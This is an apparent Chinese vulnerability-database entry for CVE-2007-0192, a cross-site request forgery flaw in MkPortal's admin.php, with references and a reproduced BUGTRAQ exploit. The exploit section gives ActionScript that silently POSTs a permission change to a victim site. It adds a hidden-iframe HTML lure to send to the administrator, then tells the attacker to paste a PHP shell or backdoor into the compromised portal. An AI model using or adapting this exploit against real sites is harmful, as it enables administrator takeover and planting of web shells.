MkPortal 'admin.php' 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192149 漏洞类型 未知
发布时间 2007-01-12 更新时间 2007-01-12
CVE编号 CVE-2007-0192 CNNVD-ID CNNVD-200701-176
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86764
https://cxsecurity.com/issue/WLB-2007010046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-176
|漏洞详情
MKPortal的admin.php中的ad_perms部分的保存主要操作中存在跨站请求伪造漏洞。远程攻击者可以修改特权设置,比如在一个.swf文件中使用admin.php的getURL,又称"所有的访客都是管理员"攻击。
|漏洞EXP
MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main",
 "_self", "POST");

Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for italian sites.

Then upload the swf file to a webserver and create an html page like this:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here<p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>

Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate MKPortal.

So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php

and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.

Translate "page" in MKPortal language.
Example: "pagina" for italian sites.
|受影响的产品
MKPortal MKPortal 1.0.1 Final
|参考资料

来源:BUGTRAQ
名称:20070104MkPortal"AllGuestsareAdmin"Exploit
链接:http://www.securityfocus.com/archive/1/archive/1/455894/100/100/threaded
来源:OSVDB
名称:33400
链接:http://osvdb.org/33400
来源:SREASON
名称:2137
链接:http://securityreason.com/securityalert/2137